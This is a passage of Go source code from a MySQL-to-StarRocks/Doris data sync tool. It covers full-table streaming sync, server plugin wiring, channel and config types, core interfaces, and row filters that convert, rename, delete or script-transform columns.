sourceSchema := fmt.Sprintf("%v", ruleMap["source-schema"]) 348 | targetSchema := fmt.Sprintf("%v", ruleMap["target-schema"]) 349 | sourceTable := fmt.Sprintf("%v", ruleMap["source-table"]) 350 | targetTable := fmt.Sprintf("%v", ruleMap["target-table"]) 351 | // 同步历史全量数据 352 | // init conn 353 | conn, err := client.Connect(fmt.Sprintf("%s:%d", inputPlugin.Host, inputPlugin.Port), 354 | inputPlugin.UserName, inputPlugin.Password, "", func(c *client.Conn) { _ = c.SetCharset("utf8") }) 355 | if err != nil { 356 | log.Errorf("rule map init conn failed. 
err: ", err.Error()) 357 | return err, 0 358 | } 359 | // bug fix: c.SetCharset no set utf8mb4, separate set utf8mb4 support emoji 360 | _, _ = conn.Execute("set names utf8mb4") 361 | // get primary key 362 | primarySql := fmt.Sprintf("SELECT COLUMN_NAME, DATA_TYPE "+ 363 | "FROM INFORMATION_SCHEMA.COLUMNS "+ 364 | "WHERE TABLE_SCHEMA = '%s' AND TABLE_NAME = '%s' AND COLUMN_KEY = 'PRI'", sourceSchema, sourceTable) 365 | rs, err := conn.Execute(primarySql) 366 | if err != nil { 367 | log.Errorf("add rule get primary key failed. err: ", err.Error()) 368 | return err, 0 369 | } 370 | 371 | if rs.RowNumber() == 0 { 372 | log.Errorf("handling not primary keys table is not currently supported") 373 | return errors.New("handling not primary keys table is not currently supported"), 0 374 | } 375 | 376 | var primaryKeyColumns []string 377 | for i := 0; i < rs.RowNumber(); i++ { 378 | columnName, _ := rs.GetString(i, 0) 379 | primaryKeyColumns = append(primaryKeyColumns, columnName) 380 | } 381 | 382 | queryColumnsSql := fmt.Sprintf("SELECT COLUMN_NAME "+ 383 | "FROM information_schema.columns "+ 384 | "WHERE table_schema = '%s' "+ 385 | "AND table_name = '%s' ORDER BY ORDINAL_POSITION", sourceSchema, sourceTable) 386 | rs, err = conn.Execute(queryColumnsSql) 387 | if err != nil { 388 | log.Errorf("add rule get columns failed. 
err: ", err.Error()) 389 | return err, 0 390 | } 391 | var columns []string 392 | for i := 0; i < rs.RowNumber(); i++ { 393 | columnName, _ := rs.GetString(i, 0) 394 | columns = append(columns, columnName) 395 | } 396 | querySql := fmt.Sprintf("SELECT * "+ 397 | "FROM %s.%s ORDER BY %s", sourceSchema, sourceTable, strings.Join(primaryKeyColumns, ",")) 398 | var result mysql.Result 399 | batchSize := 10000 400 | tmpIndex := 0 401 | var jsonRows []string 402 | var totalSize int32 403 | tableObj, err := s.GetTable(sourceSchema, sourceTable) 404 | if err != nil { 405 | return err, 0 406 | } 407 | 408 | stopTickerChan := make(chan interface{}, 1) 409 | defer close(stopTickerChan) 410 | timerPrintFullSyncDataRows(stopTickerChan, targetSchema, targetTable, &fullRows) 411 | 412 | switch outputPlugin := oo.(type) { 413 | case *output.Doris: 414 | err = conn.ExecuteSelectStreaming(querySql, &result, func(row []mysql.FieldValue) error { 415 | m := make(map[string]interface{}) 416 | for idx, val := range row { 417 | ret := val.Value() 418 | if val.Type == 4 { 419 | _, ok := val.Value().([]uint8) 420 | if ok { 421 | ret = string(val.Value().([]uint8)) 422 | } 423 | } 424 | m[columns[idx]] = ret 425 | } 426 | m[output.DeleteColumn] = 0 427 | b, _ := jsoniter.Marshal(m) 428 | jsonRows = append(jsonRows, string(b)) 429 | tmpIndex += 1 430 | // prom read event number counter 431 | metrics.OpsReadProcessed.Inc() 432 | if tmpIndex%batchSize == 0 { 433 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 434 | if err != nil { 435 | return err 436 | } 437 | fullRows = tmpIndex 438 | jsonRows = jsonRows[0:0] 439 | } 440 | return nil 441 | }, nil) 442 | 443 | if err != nil { 444 | log.Errorf("handling execute select streaming failed. 
err: %v", err.Error()) 445 | return err, tmpIndex 446 | } 447 | 448 | if len(jsonRows) > 0 { 449 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 450 | if err != nil { 451 | return err, tmpIndex 452 | } 453 | fullRows = tmpIndex 454 | } 455 | case *output.Starrocks: 456 | err = conn.ExecuteSelectStreaming(querySql, &result, func(row []mysql.FieldValue) error { 457 | m := make(map[string]interface{}) 458 | for idx, val := range row { 459 | ret := val.Value() 460 | if val.Type == 4 { 461 | _, ok := val.Value().([]uint8) 462 | if ok { 463 | if tableObj.Columns[idx].RawType == "json" { 464 | jsonCol := map[string]interface{}{} 465 | _ = json.Unmarshal(val.Value().([]uint8), &jsonCol) 466 | ret = jsonCol 467 | } else { 468 | ret = string(val.Value().([]uint8)) 469 | } 470 | } 471 | } 472 | m[columns[idx]] = ret 473 | } 474 | m[output.DeleteColumn] = 0 475 | b, _ := jsoniter.Marshal(m) 476 | totalSize = totalSize + int32(len(b)) 477 | jsonRows = append(jsonRows, string(b)) 478 | tmpIndex += 1 479 | // prom read event number counter 480 | metrics.OpsReadProcessed.Inc() 481 | // row lines = 10000 || totalSize >= 90M, 避免超过100M写入失败 (fix #23 ) 482 | if tmpIndex%batchSize == 0 || totalSize >= 94371840 { 483 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 484 | if err != nil { 485 | return err 486 | } 487 | fullRows = tmpIndex 488 | jsonRows = jsonRows[0:0] 489 | totalSize = 0 490 | } 491 | return nil 492 | }, nil) 493 | 494 | if err != nil { 495 | log.Errorf("handling execute select streaming failed. 
err: %v", err.Error()) 496 | return err, tmpIndex 497 | } 498 | 499 | if len(jsonRows) > 0 { 500 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 501 | if err != nil { 502 | return err, tmpIndex 503 | } 504 | fullRows = tmpIndex 505 | } 506 | default: 507 | // TODO 508 | } 509 | log.Infof("full data sync total rows: %d", tmpIndex) 510 | err = conn.Close() 511 | if err != nil { 512 | return err, tmpIndex 513 | } 514 | log.Infof("close conn") 515 | } 516 | log.Infof("end handle full data sync") 517 | return nil, fullRows 518 | } 519 | 520 | func timerPrintFullSyncDataRows(stopTickerChan chan interface{}, targetSchema string, targetTable string, fullRows *int) { 521 | // timer print full sync data rows 522 | ticker := time.NewTicker(time.Second * 3) 523 | go func() { 524 | defer ticker.Stop() 525 | for { 526 | select { 527 | case <-ticker.C: 528 | log.Infof("full sync data %s.%s rows: %d", targetSchema, targetTable, *fullRows) 529 | case <-stopTickerChan: 530 | log.Debugf("quit print full sync data rows goroutine") 531 | return 532 | } 533 | } 534 | }() 535 | } 536 | -------------------------------------------------------------------------------- /pkg/app/server.go: -------------------------------------------------------------------------------- 1 | package app 2 | 3 | import ( 4 | "github.com/juju/errors" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/filter" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 10 | "github.com/siddontang/go-log/log" 11 | "sync" 12 | ) 13 | 14 | type Server struct { 15 | Input core.Input 16 | InputPosition core.Position 17 | InputSchema core.Schema 18 | Output core.Output 19 | OutPutRule core.Rule 20 | SyncChan *channel.SyncChannel 21 | outputChan *channel.OutputChannel 22 | matcherFilter filter.MatcherFilter 23 
	sync.Mutex
}

// NewServer builds a Server from the parsed base config: it resolves and
// configures the output, output-rule, input, input-position and input-schema
// plugins from the registry, loads the saved position, initializes the schema
// cache, and creates the sync/output channels and filter chain.
// The wiring order matters: rules must exist before schema/output/input init.
func NewServer(config *config.BaseConfig) (*Server, error) {
	server := Server{}

	// output
	plugin, err := registry.GetPlugin(registry.OutputPlugin, config.OutputConfig.Type)
	if err != nil {
		return nil, errors.Trace(err)
	}
	log.Infof("load output plugin: %v", config.OutputConfig.Type)
	output, ok := plugin.(core.Output)
	if !ok {
		return nil, errors.Errorf("not a valid output plugin: %v", config.OutputConfig.Type)
	}
	server.Output = output
	err = plugin.Configure(config.OutputConfig.Type, config.OutputConfig.Config)
	if err != nil {
		return nil, err
	}

	// output rule
	plugin, err = registry.GetPlugin(registry.OutputRulePlugin, config.OutputConfig.Type)
	if err != nil {
		return nil, errors.Trace(err)
	}
	log.Infof("load output rule plugin: %v", config.OutputConfig.Type)
	rule, ok := plugin.(core.Rule)
	if !ok {
		return nil, errors.Errorf("not a valid output rule plugin: %v", config.OutputConfig.Type)
	}
	server.OutPutRule = rule
	err = plugin.Configure(config.OutputConfig.Type, config.OutputConfig.Config)
	if err != nil {
		return nil, err
	}

	// input
	plugin, err = registry.GetPlugin(registry.InputPlugin, config.InputConfig.Type)
	if err != nil {
		return nil, errors.Trace(err)
	}
	log.Infof("load input plugin: %v", config.InputConfig.Type)
	input, ok := plugin.(core.Input)
	if !ok {
		return nil, errors.Errorf("not a valid input type")
	}
	server.Input = input
	err = plugin.Configure(config.InputConfig.Type, config.InputConfig.Config)
	if err != nil {
		return nil, err
	}

	// input position
	// NOTE(review): unlike output/input, the position and schema plugins are
	// never Configure()d here — presumably they configure themselves in
	// LoadPosition/NewSchemaTables; confirm against the plugin implementations.
	plugin, err = registry.GetPlugin(registry.InputPositionPlugin, config.InputConfig.Type)
	if err != nil {
		return nil, errors.Trace(err)
	}
	log.Infof("load input position plugin: %v", config.InputConfig.Type)
	position, ok := plugin.(core.Position)
	if !ok {
		return nil, errors.Errorf("not a valid input position plugin: %v", config.InputConfig.Type)
	}
	server.InputPosition = position

	// input schema
	plugin, err = registry.GetPlugin(registry.InputSchemaPlugin, config.InputConfig.Type)
	if err != nil {
		return nil, errors.Trace(err)
	}
	log.Infof("load input schema plugin: %v", config.InputConfig.Type)
	schema, ok := plugin.(core.Schema)
	if !ok {
		return nil, errors.Errorf("not a valid input schema plugin: %v", config.InputConfig.Type)
	}
	server.InputSchema = schema

	// load the saved replication position
	positionData := position.LoadPosition(config)
	// initialize the schema cache
	schema.NewSchemaTables(config, config.InputConfig.Config, positionData, server.OutPutRule.GetRuleToMap())
	// initialize the output plugin
	server.Output.NewOutput(nil, server.OutPutRule.GetRuleToMap(), server.InputSchema)
	// initialize the input plugin
	server.Input.NewInput(nil, server.OutPutRule.GetRuleToRegex(), server.InputSchema)
	// initialize the channels
	server.SyncChan = &channel.SyncChannel{}
	server.SyncChan.NewChannel(config.SyncParamConfig)
	server.outputChan = &channel.OutputChannel{}
	server.outputChan.NewChannel(config.SyncParamConfig)
	// initialize the filter config
	server.matcherFilter = filter.NewMatcherFilter(config.FilterConfig)

	return &server, nil
}

// Start launches the pipeline: input -> position -> filter -> output.
// The output plugin runs in its own goroutine; the rest install their own
// background workers from StartInput/StartPosition/StartFilter.
func (s *Server) Start() error {
	s.Lock()
	defer s.Unlock()

	// start the input plugin
	s.InputPosition = s.Input.StartInput(s.InputPosition, s.SyncChan)
	// start position persistence
	s.InputPosition.StartPosition()
	// start the filter chain
	s.matcherFilter.StartFilter(s.SyncChan, s.outputChan, s.InputSchema)
	// start the output plugin
	go s.Output.StartOutput(s.outputChan)

	return nil
}
--------------------------------------------------------------------------------
/pkg/channel/ch_input.go:
-------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | ) 6 | 7 | type SyncChannel struct { 8 | SyncChan chan interface{} 9 | FLushCHanMaxWaitSecond int 10 | Done chan struct{} 11 | } 12 | 13 | func (sc *SyncChannel) NewChannel(config *config.SyncParamConfig) { 14 | sc.SyncChan = make(chan interface{}, config.ChannelSize) 15 | sc.FLushCHanMaxWaitSecond = config.FlushDelaySecond 16 | sc.Done = make(chan struct{}) 17 | } 18 | 19 | func (sc *SyncChannel) GetChannel() interface{} { 20 | return sc 21 | } 22 | 23 | func (sc *SyncChannel) Close() { 24 | close(sc.Done) 25 | } 26 | -------------------------------------------------------------------------------- /pkg/channel/ch_output.go: -------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | ) 6 | 7 | type OutputChannel struct { 8 | SyncChan chan interface{} 9 | ChannelSize int 10 | FLushCHanMaxWaitSecond int 11 | Done chan struct{} 12 | } 13 | 14 | func (oc *OutputChannel) NewChannel(config *config.SyncParamConfig) { 15 | oc.SyncChan = make(chan interface{}, config.ChannelSize) 16 | oc.ChannelSize = config.ChannelSize 17 | oc.FLushCHanMaxWaitSecond = config.FlushDelaySecond 18 | oc.Done = make(chan struct{}) 19 | } 20 | 21 | func (oc *OutputChannel) GetChannel() interface{} { 22 | return oc 23 | } 24 | 25 | func (oc *OutputChannel) Close() { 26 | close(oc.Done) 27 | } 28 | -------------------------------------------------------------------------------- /pkg/channel/interface.go: -------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 4 | 5 | type Channel interface { 6 | NewChannel(config *config.SyncParamConfig) 7 | GetChannel() interface{} 8 | Close() 9 | } 10 
| -------------------------------------------------------------------------------- /pkg/config/base.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "github.com/BurntSushi/toml" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | "path/filepath" 8 | ) 9 | 10 | type BaseConfig struct { 11 | Name string 12 | InputConfig *InputConfig `toml:"input"` 13 | OutputConfig *OutputConfig `toml:"output"` 14 | SyncParamConfig *SyncParamConfig `toml:"sync-param"` 15 | FilterConfig []*FilterConfig `toml:"filter"` 16 | FileName *string 17 | } 18 | 19 | type MysqlConfig struct { 20 | Host string 21 | Port int 22 | UserName string 23 | Password string 24 | } 25 | 26 | type MongoConfig struct { 27 | Uri string 28 | UserName string 29 | Password string 30 | } 31 | 32 | type StarrocksConfig struct { 33 | Host string 34 | Port int 35 | LoadPort int `mapstructure:"load-port"` 36 | UserName string 37 | Password string 38 | } 39 | 40 | type DorisConfig struct { 41 | Host string 42 | Port int 43 | LoadPort int `mapstructure:"load-port"` 44 | UserName string 45 | Password string 46 | } 47 | 48 | type SyncParamConfig struct { 49 | ChannelSize int `toml:"channel-size"` 50 | FlushDelaySecond int `toml:"flush-delay-second"` 51 | } 52 | 53 | type FilterConfig struct { 54 | Type string `toml:"type"` 55 | Config map[string]interface{} `toml:"config"` 56 | } 57 | 58 | type InputConfig struct { 59 | Type string `toml:"type"` 60 | StartPosition string `toml:"start-position"` 61 | Config map[string]interface{} `toml:"config"` 62 | } 63 | 64 | type OutputConfig struct { 65 | Type string `toml:"type"` 66 | Config map[string]interface{} `toml:"config"` 67 | } 68 | 69 | func NewBaseConfig(fileName *string) *BaseConfig { 70 | var bc = &BaseConfig{} 71 | fileNamePath, err := filepath.Abs(*fileName) 72 | if err != nil { 73 | log.Fatal(err) 74 | } 75 | bc.FileName = &fileNamePath 76 | err = bc.ReadBaseConfig() 77 | 
if err != nil { 78 | log.Fatal(err) 79 | } 80 | return bc 81 | } 82 | 83 | func (bc *BaseConfig) ReadBaseConfig() error { 84 | var err error 85 | if _, err = toml.DecodeFile(*bc.FileName, bc); err != nil { 86 | return errors.Trace(err) 87 | } 88 | return err 89 | } 90 | -------------------------------------------------------------------------------- /pkg/core/input.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 5 | "regexp" 6 | ) 7 | 8 | type Input interface { 9 | NewInput(config interface{}, ruleRegex []string, inSchema Schema) 10 | StartInput(pos Position, syncChan *channel.SyncChannel) Position 11 | StartMetrics() 12 | Close() 13 | SetIncludeTableRegex(map[string]interface{}) (*regexp.Regexp, error) // for add rule 14 | RemoveIncludeTableRegex(map[string]interface{}) (*regexp.Regexp, error) // for delete rule 15 | } 16 | -------------------------------------------------------------------------------- /pkg/core/output.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 7 | ) 8 | 9 | type Output interface { 10 | NewOutput(config interface{}, rulesMap map[string]interface{}, inSchema Schema) 11 | StartOutput(outputChan *channel.OutputChannel) 12 | Execute(msgs []*msg.Msg, tableObj *schema.Table, targetSchema string, targetTable string) error 13 | Close() 14 | AddRule(map[string]interface{}) error 15 | DeleteRule(map[string]interface{}) error 16 | GetRules() interface{} 17 | Pause() error 18 | Resume() error 19 | IsPaused() bool 20 | } 21 | -------------------------------------------------------------------------------- /pkg/core/position.go: 
--------------------------------------------------------------------------------
package core

import "github.com/fatalclarine/go-mysql-starrocks/pkg/config"

// Position is the contract for replication-position plugins: load/save the
// persisted position and run the background persistence loop.
type Position interface {
	LoadPosition(config *config.BaseConfig) string
	SavePosition() error
	ModifyPosition(v string) error
	StartPosition()
	Close()
}
--------------------------------------------------------------------------------
/pkg/core/rule.go:
--------------------------------------------------------------------------------
package core

// Rule is the contract for output-rule plugins: it exposes the configured
// source->target table mappings as a map, as regex strings, and per key.
type Rule interface {
	NewRule(map[string]interface{})
	GetRuleToRegex() []string
	GetRuleToMap() map[string]interface{}
	GetRule(key string) interface{}
	TargetString() string
}
--------------------------------------------------------------------------------
/pkg/core/schema.go:
--------------------------------------------------------------------------------
package core

import (
	"github.com/fatalclarine/go-mysql-starrocks/pkg/config"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/schema"
)

// Schema is the contract for table-metadata plugins: a cache of source table
// definitions that can be added to, refreshed, queried and persisted.
type Schema interface {
	NewSchemaTables(config *config.BaseConfig, pluginConfig map[string]interface{}, startPos string, rulesMap map[string]interface{})
	AddTableForMsg(msg *msg.Msg) error
	AddTable(db string, table string) (*schema.Table, error)
	DelTable(db string, table string) error
	UpdateTable(db string, table string, args interface{}, pos string, index int) error
	GetTable(db string, table string) (*schema.Table, error)
	RefreshTable(db string, table string)
	SaveMeta(data string) error
	Close()
}
--------------------------------------------------------------------------------
/pkg/filter/filter_convert_dml_column.go:
--------------------------------------------------------------------------------
package filter

import (
	"encoding/json"
"fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 9 | "github.com/siddontang/go-log/log" 10 | ) 11 | 12 | const ConvertDmlColumnFilterName = "convert-dml-column" 13 | 14 | type ConvertDmlColumnFilter struct { 15 | name string 16 | matchSchema string 17 | matchTable string 18 | columns []string 19 | castAs []string 20 | } 21 | 22 | func (cdcf *ConvertDmlColumnFilter) NewFilter(config map[string]interface{}) error { 23 | columns, ok := config["columns"] 24 | if !ok { 25 | return errors.Trace(errors.New("'columns' is not configured")) 26 | } 27 | castAs, ok := config["cast-as"] 28 | if !ok { 29 | return errors.Trace(errors.New("'cast-as' is not configured")) 30 | } 31 | 32 | c, ok := utils.CastToSlice(columns) 33 | if !ok { 34 | return errors.Trace(errors.New("'columns' should be an array")) 35 | } 36 | 37 | columnsString, err := utils.CastSliceInterfaceToSliceString(c) 38 | if err != nil { 39 | return errors.Trace(errors.New("'columns' should be an array of string")) 40 | } 41 | 42 | ca, ok := utils.CastToSlice(castAs) 43 | if !ok { 44 | return errors.Trace(errors.New("'cast-as' should be an array")) 45 | } 46 | 47 | castAsString, err := utils.CastSliceInterfaceToSliceString(ca) 48 | if err != nil { 49 | return errors.Trace(errors.New("'cast-as' should be an array of string")) 50 | } 51 | 52 | if len(c) != len(ca) { 53 | return errors.Trace(errors.New("'columns' should have the same length of 'cast-as'")) 54 | } 55 | 56 | cdcf.name = ConvertDmlColumnFilterName 57 | cdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"]) 58 | cdcf.matchTable = fmt.Sprintf("%v", config["match-table"]) 59 | cdcf.columns = columnsString 60 | cdcf.castAs = castAsString 61 | return nil 62 | } 63 | 64 | func (cdcf *ConvertDmlColumnFilter) Filter(msg *msg.Msg) bool { 65 | if cdcf.matchSchema == msg.Database && cdcf.matchTable == msg.Table { 66 | for i, column := range cdcf.columns { 67 | 
value := FindColumn(msg.DmlMsg.Data, column) 68 | if value != nil { 69 | if value == "" { 70 | continue 71 | } 72 | 73 | switch cdcf.castAs[i] { 74 | case "json": 75 | var columnJson map[string]interface{} 76 | err := json.Unmarshal([]byte(fmt.Sprintf("%v", value)), &columnJson) 77 | if err != nil { 78 | log.Warnf("%s filter error: %v, column '%s' value: '%v' cast as json error, row event: %v", 79 | cdcf.name, err.Error(), column, value, msg.DmlMsg.Data) 80 | } 81 | msg.DmlMsg.Data[column] = columnJson 82 | case "arrayJson": 83 | var columnArrayJson []map[string]interface{} 84 | err := json.Unmarshal([]byte(fmt.Sprintf("%v", value)), &columnArrayJson) 85 | if err != nil { 86 | log.Warnf("%s filter error: %v, column '%s' value: '%v' cast as json error, row event: %v", 87 | cdcf.name, err.Error(), column, value, msg.DmlMsg.Data) 88 | } 89 | msg.DmlMsg.Data[column] = columnArrayJson 90 | } 91 | } 92 | } 93 | } 94 | return false 95 | } 96 | -------------------------------------------------------------------------------- /pkg/filter/filter_convert_snakecase_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "github.com/iancoleman/strcase" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 6 | ) 7 | 8 | const ConvertSnakeCaseColumnFilterName = "convert-snakecase-column" 9 | 10 | type ConvertSnakeCaseColumnFilter struct { 11 | name string 12 | } 13 | 14 | func (cdcf *ConvertSnakeCaseColumnFilter) NewFilter(config map[string]interface{}) error { 15 | cdcf.name = ConvertSnakeCaseColumnFilterName 16 | return nil 17 | } 18 | 19 | func (cdcf *ConvertSnakeCaseColumnFilter) Filter(m *msg.Msg) bool { 20 | if m.Type == msg.MsgCtl { 21 | return false 22 | } 23 | for v := range m.DmlMsg.Data { 24 | snakeName := strcase.ToSnake(v) 25 | if snakeName != v { 26 | m.DmlMsg.Data[snakeName] = m.DmlMsg.Data[v] 27 | delete(m.DmlMsg.Data, v) 28 | } 29 | } 30 | return false 31 | } 32 | 
--------------------------------------------------------------------------------
/pkg/filter/filter_delete_dml_column.go:
--------------------------------------------------------------------------------
package filter

import (
	"fmt"
	"github.com/juju/errors"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/utils"
)

const DeleteDMLColumnFilterName = "delete-dml-column"

// DeleteDmlColumnFilter removes the configured columns from matching rows.
type DeleteDmlColumnFilter struct {
	name        string
	matchSchema string
	matchTable  string
	columns     []string
}

// NewFilter validates that 'columns' is an array of strings and records the
// match-schema/match-table selector.
func (ddcf *DeleteDmlColumnFilter) NewFilter(config map[string]interface{}) error {
	columns := config["columns"]
	c, ok := utils.CastToSlice(columns)
	if !ok {
		return errors.Trace(errors.New("'column' should be an array"))
	}

	columnsString, err := utils.CastSliceInterfaceToSliceString(c)
	if err != nil {
		return errors.Trace(errors.New("'column' should be an array of string"))
	}
	ddcf.name = DeleteDMLColumnFilterName
	ddcf.matchSchema = fmt.Sprintf("%v", config["match-schema"])
	ddcf.matchTable = fmt.Sprintf("%v", config["match-table"])
	ddcf.columns = columnsString
	return nil
}

// Filter deletes the configured columns in place; it never drops the message.
func (ddcf *DeleteDmlColumnFilter) Filter(msg *msg.Msg) bool {
	if ddcf.matchSchema == msg.Database && ddcf.matchTable == msg.Table {
		for _, column := range ddcf.columns {
			value := FindColumn(msg.DmlMsg.Data, column)
			if value != nil {
				delete(msg.DmlMsg.Data, column)
				// msg.IgnoreColumns = append(msg.IgnoreColumns, column)
			}
		}
	}
	return false
}
--------------------------------------------------------------------------------
/pkg/filter/filter_js_dml_column.go:
--------------------------------------------------------------------------------
package filter

import (
	"fmt"
	"github.com/dop251/goja"
	"github.com/juju/errors"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/siddontang/go-log/log"
	"os"
)

const JsDmlColumnFilterName = "js-dml-column"

// JsDmlColumnFilter runs a user-supplied JavaScript function (process_row)
// against each matching row via the goja runtime.
type JsDmlColumnFilter struct {
	name        string
	matchSchema string
	matchTable  string
	JsFile      string
	JsVm        *goja.Runtime
	processRow  func(map[string]interface{}) *goja.Object
}

// NewFilter records the selector, loads the script at 'js-file' and binds its
// process_row function.
func (jdcf *JsDmlColumnFilter) NewFilter(config map[string]interface{}) error {
	jsFile, ok := config["js-file"]
	if !ok {
		return errors.Trace(errors.New("'js-file' is not configured"))
	}
	jdcf.name = JsDmlColumnFilterName
	jdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"])
	jdcf.matchTable = fmt.Sprintf("%v", config["match-table"])
	jdcf.JsFile = fmt.Sprintf("%v", jsFile)
	err := jdcf.loadJs()
	if err != nil {
		return err
	}
	return nil
}

// Filter passes the row to process_row; a nil result drops the message
// (returns true), otherwise the returned object replaces the row data.
// int64 values are stringified first so they survive the JS number domain.
func (jdcf *JsDmlColumnFilter) Filter(msg *msg.Msg) bool {
	if jdcf.matchSchema == msg.Database && jdcf.matchTable == msg.Table {
		for k, v := range msg.DmlMsg.Data {
			switch v.(type) {
			case int64:
				msg.DmlMsg.Data[k] = fmt.Sprintf("%v", v)
			}
		}
		rs := jdcf.processRow(msg.DmlMsg.Data)
		if rs == nil {
			return true
		}
		var res map[string]interface{}
		err := jdcf.JsVm.ExportTo(rs, &res)
		if err != nil {
			// NOTE(review): an export failure kills the whole process
			log.Fatal(err)
		}
		msg.DmlMsg.Data = res
	}
	return false
}

// loadJs reads the script file, evaluates it in a fresh goja VM and exports
// its process_row function into jdcf.processRow.
func (jdcf *JsDmlColumnFilter) loadJs() error {
	file, err := os.ReadFile(jdcf.JsFile)
	if err != nil {
		return err
	}
	vm := goja.New()
	vm.SetFieldNameMapper(goja.TagFieldNameMapper("json", true))
	_, err = vm.RunString(string(file))
	if err != nil {
		return err
	}
	err = vm.ExportTo(vm.Get("process_row"), &jdcf.processRow)
	if err != nil {
		return err
	}
	jdcf.JsVm = vm
	return nil
}
--------------------------------------------------------------------------------
/pkg/filter/filter_rename_dml_column.go:
--------------------------------------------------------------------------------
package filter

import (
	"fmt"
	"github.com/juju/errors"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/utils"
)

const RenameDmlColumnFilterName = "rename-dml-column"

// RenameDmlColumnFilter renames configured columns of matching rows
// (columns[i] -> renameAs[i]).
type RenameDmlColumnFilter struct {
	name        string
	matchSchema string
	matchTable  string
	columns     []string
	renameAs    []string
}

// NewFilter validates that 'columns' and 'rename-as' are string arrays of
// equal length and records the match-schema/match-table selector.
func (rdcf *RenameDmlColumnFilter) NewFilter(config map[string]interface{}) error {
	columns, ok := config["columns"]
	if !ok {
		return errors.Trace(errors.New("'columns' is not configured"))
	}
	renameAs, ok := config["rename-as"]
	if !ok {
		return errors.Trace(errors.New("'rename-as' is not configured"))
	}

	c, ok := utils.CastToSlice(columns)
	if !ok {
		return errors.Trace(errors.New("'columns' should be an array"))
	}

	columnsString, err := utils.CastSliceInterfaceToSliceString(c)
	if err != nil {
		return errors.Trace(errors.New("'columns' should be an array of string"))
	}

	ra, ok := utils.CastToSlice(renameAs)
	if !ok {
		return errors.Trace(errors.New("'rename-as' should be an array"))
	}

	renameAsString, err := utils.CastSliceInterfaceToSliceString(ra)
	if err != nil {
		return errors.Trace(errors.New("'cast-as' should be an array of string"))
	}

	if len(c) != len(ra) {
		return errors.Trace(errors.New("'columns' should have the same length of 'rename-as'"))
	}

	rdcf.name = RenameDmlColumnFilterName
	rdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"])
	rdcf.matchTable = fmt.Sprintf("%v", config["match-table"])
	rdcf.columns = columnsString
	rdcf.renameAs = renameAsString
	return nil
}

// Filter renames the configured columns in place; it never drops the message.
func (rdcf *RenameDmlColumnFilter) Filter(msg *msg.Msg) bool {
	if rdcf.matchSchema == msg.Database && rdcf.matchTable == msg.Table {
		for i, column := range rdcf.columns {
			value := FindColumn(msg.DmlMsg.Data, column)
			if value != nil {
				renameAsColumn := rdcf.renameAs[i]
				msg.DmlMsg.Data[renameAsColumn] = msg.DmlMsg.Data[column]
				delete(msg.DmlMsg.Data, column)
			}
		}
	}
	return false
}
--------------------------------------------------------------------------------
/pkg/filter/interface.go:
--------------------------------------------------------------------------------
package filter

import (
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
)

// Filter is the contract of all row filters; Filter returns true to drop the
// message and false to pass it on (possibly mutated).
type Filter interface {
	NewFilter(config map[string]interface{}) error
	Filter(msg *msg.Msg) bool
}
--------------------------------------------------------------------------------
/pkg/filter/matcher.go:
--------------------------------------------------------------------------------
package filter

import (
	"github.com/fatalclarine/go-mysql-starrocks/pkg/channel"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/config"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/core"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/metrics"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/siddontang/go-log/log"
)

// MatcherFilter is the ordered chain of configured filters.
type MatcherFilter []Filter

// NewMatcherFilter builds the chain from [[filter]] config entries; unknown
// filter types are logged and skipped, config errors are fatal.
func NewMatcherFilter(filterConfigs []*config.FilterConfig) MatcherFilter {
	var matcher MatcherFilter
	for _, fc := range filterConfigs {
		switch typ := fc.Type; typ {
		case DeleteDMLColumnFilterName:
			ddcf := &DeleteDmlColumnFilter{}
			if err := ddcf.NewFilter(fc.Config); err != nil {
				log.Fatal(err)
			}
			matcher = append(matcher, ddcf)
		case ConvertDmlColumnFilterName:
			cdcf := &ConvertDmlColumnFilter{}
			if err := cdcf.NewFilter(fc.Config); err != nil {
				log.Fatal(err)
			}
			matcher = append(matcher, cdcf)
